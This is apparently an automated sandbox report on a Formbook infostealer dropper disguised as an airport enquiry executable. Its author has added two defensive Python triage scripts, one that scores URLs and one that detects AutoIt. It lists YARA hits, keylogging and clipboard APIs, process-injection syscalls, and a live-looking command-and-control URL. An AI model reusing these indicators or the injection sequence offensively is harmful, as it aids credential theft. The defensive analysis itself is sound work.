          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
          Source: explorer.exe, 00000002.00000002.4133281259.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
          Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
          Source: explorer.exe, 00000002.00000002.4144395601.000000001130F000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.4132018408.00000000059EF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.theselflovesite.com/pt46/?ara=RFlzK8LCC7FuO7cJ0ecz1aHzXPpVQPZoCqNi80z/o3n5SIq8wUQ5l6Qg5p
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CF425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00CF425A
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CF4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00CF4458
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CF425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00CF425A
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00CE0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00CE0219
          Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exeCode function: 0_2_00D0CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00D0CDAC
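The URL rows above are mostly what a stock explorer.exe keeps on its heap for the news, weather and Office taskbar tiles (msn.com, office.com, windows.com). One string behaves differently: the theselflovesite.com URL sits in both explorer.exe and msiexec.exe, the two processes the report names as injection targets, and in mapped sections rather than private heap memory. The Python below is an added triage script, not part of the Joe Sandbox report, that scores each row on exactly those signals. It assumes the fifth field of an .sdmp name is a Win32 PAGE_* protection and the seventh a MEM_* region type (an inference from the names in this report, not something the page documents), and the allowlist of expected telemetry hosts is the example's own.

```python
import re
from urllib.parse import urlsplit

# winnt.h constants.  Reading the fifth .sdmp name field as a PAGE_* protection
# and the seventh as a MEM_* region type is this example's inference from the
# names in the report, not something the report documents.
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
MEM_MAPPED = 0x40000
MEM_IMAGE = 0x1000000

# Hosts a stock explorer.exe contacts for news, weather and Office tiles.  The
# allowlist is an assumption of this example; build yours from a clean baseline.
EXPECTED_HOST_SUFFIXES = ("msn.com", "office.com", "windows.com", "akamaized.net")

ROW_RE = re.compile(r"Source:\s*(.*?)\s*\|?\s*String found in binary or memory:\s*(\S+)")
DUMP_RE = re.compile(r"(\S+\.exe), ([0-9A-Fa-f.]+)\.sdmp")

# Rows copied from this report; the parser accepts them with or without a
# separator between the Source and Details columns.
SAMPLE_ROWS = [
    "Source: explorer.exe, 00000002.00000002.4140282960.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1694928784.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://excel.office.com",
    "Source: explorer.exe, 00000002.00000002.4140282960.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1694928784.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.com_",
    "Source: explorer.exe, 00000002.00000002.4133281259.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1691155621.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com:443/en-us/feed",
    "Source: explorer.exe, 00000002.00000002.4144395601.000000001130F000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.4132018408.00000000059EF000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.theselflovesite.com/pt46/?ara=RFlzK8LCC7FuO7cJ0ecz1aHzXPpVQPZoCqNi80z/o3n5SIq8wUQ5l6Qg5p",
]


def decode_dump(name):
    """Split a Joe Sandbox .sdmp name.  Assumed field layout (inferred from the
    names in this report): procIndex.stage.dumpId.base.protection.?.regionType.?"""
    f = name.split(".")
    return {"proc_index": int(f[0], 16), "base": int(f[3], 16),
            "protect": int(f[4], 16), "region_type": int(f[6], 16)}


def expected_host(host):
    return any(host == s or host.endswith("." + s) for s in EXPECTED_HOST_SUFFIXES)


def _add(entry, points, reason):
    """Count each distinct reason once, even if the same region is listed twice."""
    if reason not in entry["reasons"]:
        entry["reasons"].append(reason)
        entry["score"] += points


def triage_url_rows(rows):
    """Score each URL: +2 per executable non-image region holding it, +1 per
    writable mapped section holding it (how a hollowed payload gets placed),
    +2 if the same string sits in more than one process, +1 if the host is
    off the telemetry allowlist.  Returns {url: {score, reasons, procs}}."""
    result = {}
    for line in rows:
        m = ROW_RE.search(line)
        if not m:
            continue
        src, url = m.groups()
        entry = result.setdefault(url, {"score": 0, "reasons": [], "procs": set()})
        for proc, dump in DUMP_RE.findall(src):
            d = decode_dump(dump)
            entry["procs"].add(proc)
            if d["region_type"] == MEM_IMAGE:
                continue  # string lives in a loaded module: nothing to flag by itself
            if d["protect"] in (PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE):
                _add(entry, 2, f"executable non-image region {d['base']:#x} in {proc}")
            elif d["region_type"] == MEM_MAPPED:
                _add(entry, 1, f"writable mapped section {d['base']:#x} in {proc}")
    for url, entry in result.items():
        host = urlsplit(url).hostname or ""
        if len(entry["procs"]) > 1:
            _add(entry, 2, f"same string in {len(entry['procs'])} processes: {sorted(entry['procs'])}")
        if not expected_host(host):
            _add(entry, 1, f"host {host!r} not in expected-telemetry allowlist")
    return result


def suspicious_urls(rows, threshold=3):
    """URLs worth a C2 lookup; 3 points means at least two independent signals."""
    return sorted(u for u, e in triage_url_rows(rows).items() if e["score"] >= threshold)


if __name__ == "__main__":
    for url, e in triage_url_rows(SAMPLE_ROWS).items():
        print(f"{e['score']:2d}  {url}\n    " + "\n    ".join(e["reasons"] or ["no signal"]))
```

Run against the four sample rows, only the theselflovesite.com URL crosses the threshold (two mapped-section hits, two processes, unknown host); the office.com and msn.com strings score zero and the truncated outlook.com_ string scores one for its host alone. The host allowlist is deliberately the weakest signal: a C2 hosted on a compromised site under an allowlisted suffix would still be caught by the cross-process and memory-region checks.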

          E-Banking Fraud

Source: Yara match | File source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.2670000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1732135367.0000000002671000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1732565448.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4131140832.0000000004D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1688631201.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4130578535.0000000003100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4131191580.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

Source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.svchost.exe.2670000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.svchost.exe.2670000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.svchost.exe.2670000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.New Al Maktoum International Airport Enquiry Ref #2401249.exe.3af0000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.4143107748.000000000E6AA000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 00000001.00000002.1732135367.0000000002671000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1732135367.0000000002671000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.1732135367.0000000002671000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.1732565448.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1732565448.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.1732565448.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.4131140832.0000000004D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4131140832.0000000004D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.4131140832.0000000004D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1688631201.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.1688631201.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.1688631201.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.4130578535.0000000003100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4130578535.0000000003100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.4130578535.0000000003100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.4131191580.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.4131191580.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.4131191580.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: New Al Maktoum International Airport Enquiry Ref #2401249.exe PID: 7428, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: svchost.exe PID: 7456, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: msiexec.exe PID: 7504, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe | Code function: This is a third-party compiled AutoIt script. | 0_2_00C83B4C
Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe, 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_221534b7-f
Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe, 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_f32cfdd0-5
Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_bbc5067e-4
Source: New Al Maktoum International Airport Enquiry Ref #2401249.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_fb4fb756-1
Source: initial sample | Static PE information: Filename: New Al Maktoum International Airport Enquiry Ref #2401249.exe
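The rows above identify the dropper as a compiled AutoIt script from one string, the AutoIt3 runtime banner "This is a third-party compiled AutoIt script.", which the sandbox found both as static data and in the mapped image at 0x00D35000. That banner is in every AutoIt3 interpreter, so on its own it only says the binary is AutoIt; the embedded script resource is what distinguishes a compiled script from the bare runtime. The Python below is an added example, not part of this report, that checks a file for both. The 16-byte script-resource header and the "AU3!EA06" tag it looks for are the signatures public AutoIt unpackers key on; they do not appear anywhere in this report and are the example's own assumption, and the sample buffer it scans is constructed, not bytes from the real sample.

```python
import struct

# The banner is the string the report found in the sample.  The 16-byte header
# and the "AU3!EA06" tag mark the start of the script resource inside an AutoIt3
# compiled binary; they are the signatures public unpackers search for and are
# an assumption of this example, not something this report lists.
AUTOIT_BANNER = b"This is a third-party compiled AutoIt script."
AU3_HEADER = bytes.fromhex("a3484bbe986c4aa9994c530a86d6487d")
AU3_TAG = b"AU3!EA06"


def find_all(data, needle):
    """Every offset at which needle occurs in data (overlaps included)."""
    hits, pos = [], data.find(needle)
    while pos != -1:
        hits.append(pos)
        pos = data.find(needle, pos + 1)
    return hits


def is_pe(data):
    """Minimal MZ/PE header check: e_lfanew at 0x3C must point at the PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def find_autoit_markers(data):
    return {
        "banner": find_all(data, AUTOIT_BANNER),
        "au3_header": find_all(data, AU3_HEADER),
        "au3_tag": find_all(data, AU3_TAG),
    }


def classify(data):
    """'compiled AutoIt script' needs the runtime banner plus a script resource
    (header immediately followed by the AU3!EA06 tag); the banner alone is
    just the AutoIt3 interpreter with nothing embedded."""
    if not is_pe(data):
        return "not a PE file"
    m = find_autoit_markers(data)
    tag_at = len(AU3_HEADER)
    has_script = any(data[o + tag_at:o + tag_at + len(AU3_TAG)] == AU3_TAG
                     for o in m["au3_header"])
    if m["banner"] and has_script:
        return "compiled AutoIt script"
    if m["banner"]:
        return "AutoIt3 runtime, no embedded script found"
    return "not AutoIt"


def scan_file(path):
    with open(path, "rb") as fh:
        return classify(fh.read())


# Constructed stand-in for a compiled AutoIt binary: a minimal MZ/PE header, the
# banner, and a script-resource header.  These are not bytes from the real sample.
_PE_STUB = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40) + b"PE\0\0" + b"\0" * 0x100
SAMPLE_PE = _PE_STUB + AUTOIT_BANNER + b"\0" * 16 + AU3_HEADER + AU3_TAG + b"\0" * 32
PLAIN_PE = _PE_STUB + b"\0" * 64


if __name__ == "__main__":
    import sys
    for p in sys.argv[1:]:
        print(p, "->", scan_file(p))
    print("constructed sample ->", classify(SAMPLE_PE))
```

Point `scan_file` at the dropper to reproduce the sandbox's "compiled AutoIt script" verdict; a file that yields "AutoIt3 runtime, no embedded script found" is either the plain interpreter or a build whose script resource has been obfuscated past these markers, which is where an unpacker rather than a string scan takes over.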
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072B60 NtClose,LdrInitializeThunk, | 1_2_03072B60
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072BF0 NtAllocateVirtualMemory,LdrInitializeThunk, | 1_2_03072BF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072AD0 NtReadFile,LdrInitializeThunk, | 1_2_03072AD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072F30 NtCreateSection,LdrInitializeThunk, | 1_2_03072F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072F90 NtProtectVirtualMemory,LdrInitializeThunk, | 1_2_03072F90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072FB0 NtResumeThread,LdrInitializeThunk, | 1_2_03072FB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072FE0 NtCreateFile,LdrInitializeThunk, | 1_2_03072FE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072E80 NtReadVirtualMemory,LdrInitializeThunk, | 1_2_03072E80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, | 1_2_03072EA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072D10 NtMapViewOfSection,LdrInitializeThunk, | 1_2_03072D10
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072D30 NtUnmapViewOfSection,LdrInitializeThunk, | 1_2_03072D30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072DD0 NtDelayExecution,LdrInitializeThunk, | 1_2_03072DD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk, | 1_2_03072DF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072CA0 NtQueryInformationToken,LdrInitializeThunk, | 1_2_03072CA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03074340 NtSetContextThread, | 1_2_03074340
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03074650 NtSuspendThread, | 1_2_03074650
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072B80 NtQueryInformationFile, | 1_2_03072B80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072BA0 NtEnumerateValueKey, | 1_2_03072BA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072BE0 NtQueryValueKey, | 1_2_03072BE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072AB0 NtWaitForSingleObject, | 1_2_03072AB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072AF0 NtWriteFile, | 1_2_03072AF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072F60 NtCreateProcessEx, | 1_2_03072F60
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072FA0 NtQuerySection, | 1_2_03072FA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072E30 NtWriteVirtualMemory, | 1_2_03072E30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072EE0 NtQueueApcThread, | 1_2_03072EE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072D00 NtSetInformationFile, | 1_2_03072D00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072DB0 NtEnumerateKey, | 1_2_03072DB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072C00 NtQueryInformationProcess, | 1_2_03072C00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072C60 NtCreateKey, | 1_2_03072C60
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072C70 NtFreeVirtualMemory, | 1_2_03072C70
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072CC0 NtQueryVirtualMemory, | 1_2_03072CC0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072CF0 NtOpenProcess, | 1_2_03072CF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03073010 NtOpenDirectoryObject, | 1_2_03073010
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03073090 NtSetValueKey, | 1_2_03073090
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030735C0 NtCreateMutant, | 1_2_030735C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030739B0 NtGetContextThread, | 1_2_030739B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03073D10 NtOpenProcessToken, | 1_2_03073D10
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03073D70 NtOpenThread, | 1_2_03073D70
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0268A360 NtCreateFile, | 1_2_0268A360
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0268A410 NtReadFile, | 1_2_0268A410
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0268A490 NtClose, | 1_2_0268A490
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0268A540 NtAllocateVirtualMemory, | 1_2_0268A540
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0268A35A NtCreateFile, | 1_2_0268A35A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0268A45A NtClose, | 1_2_0268A45A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0268A40D NtReadFile, | 1_2_0268A40D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0268A48A NtClose, | 1_2_0268A48A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0268A53C NtAllocateVirtualMemory, | 1_2_0268A53C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035EA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,NtClose, | 1_2_035EA036
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035EA042 NtQueryInformationProcess, | 1_2_035EA042
